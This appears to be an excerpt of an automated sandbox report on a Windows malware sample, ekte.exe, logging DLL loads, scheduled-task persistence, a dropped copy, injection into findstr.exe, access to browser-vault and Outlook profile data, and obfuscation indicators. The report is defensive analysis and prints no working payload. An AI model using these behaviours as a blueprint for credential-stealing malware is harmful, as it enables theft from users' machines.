Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: riched32.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: version.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Windows\SysWOW64\RichEd32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\ekte.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: ekte.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ekte.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
PE file contains sections with non-standard names
Source: sqlite3.dll.19.dr Static PE information: section name: /4
Source: sqlite3.dll.19.dr Static PE information: section name: /19
Source: sqlite3.dll.19.dr Static PE information: section name: /31
Source: sqlite3.dll.19.dr Static PE information: section name: /45
Source: sqlite3.dll.19.dr Static PE information: section name: /57
Source: sqlite3.dll.19.dr Static PE information: section name: /70
Source: sqlite3.dll.19.dr Static PE information: section name: /81
Source: sqlite3.dll.19.dr Static PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00402145 pushad ; retf 8_2_00402170
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0041423E push ebp; retf 8_2_0041423F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004032E0 push eax; ret 8_2_004032E2
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004142F0 pushad ; iretd 8_2_004142F3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0041163E push cs; retf 8_2_0041164B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BDFA1 push ecx; ret 8_2_009BDFB4
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 18_2_0042D8CA pushad ; ret 18_2_0042D8CB
Source: ekte.exe Static PE information: section name: .text entropy: 7.8327880515520985
Source: eFDiSxeTfjUqTk.exe.0.dr Static PE information: section name: .text entropy: 7.8327880515520985
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, IllM6A3aZOPcMgXjOU.cs High entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, bjGcTBS7eYkmH0ESo8.cs High entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, LbhCp6bqvsHPITEbbd.cs High entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, EBF8HKpg2H8gNx5JlU.cs High entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs High entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, FBLsfKKwpF9k583lKwM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, vt8cqPvll0puwSpjTi.cs High entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, bWcZ41KMwu9OHEiK6Qt.cs High entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, nNTYENVbpVNaaaQZwt.cs High entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, UkVUKC2jEai4CGi2Se.cs High entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, PJcM4TPF3FkembsOYq.cs High entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, wyR6uyonrymvyqkOh2.cs High entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, WBNVGjz7eRqJ47EZn1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, K1rZtSUuKDiT2gXLO3.cs High entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, m6ldtHNLsJmcXYbkiX.cs High entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, rrydSlZNZ76wCXitSf.cs High entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, DSJdqD9Y86mwaZScjh.cs High entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs High entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, iE2YC2sTBAG7vR9RqE.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, zpJ0IIOQqJJKMuU1Tp.cs High entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, IllM6A3aZOPcMgXjOU.cs High entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, bjGcTBS7eYkmH0ESo8.cs High entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, LbhCp6bqvsHPITEbbd.cs High entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, EBF8HKpg2H8gNx5JlU.cs High entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs High entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, FBLsfKKwpF9k583lKwM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, vt8cqPvll0puwSpjTi.cs High entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, bWcZ41KMwu9OHEiK6Qt.cs High entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, nNTYENVbpVNaaaQZwt.cs High entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, UkVUKC2jEai4CGi2Se.cs High entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, PJcM4TPF3FkembsOYq.cs High entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, wyR6uyonrymvyqkOh2.cs High entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, WBNVGjz7eRqJ47EZn1.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, K1rZtSUuKDiT2gXLO3.cs High entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, m6ldtHNLsJmcXYbkiX.cs High entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, rrydSlZNZ76wCXitSf.cs High entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
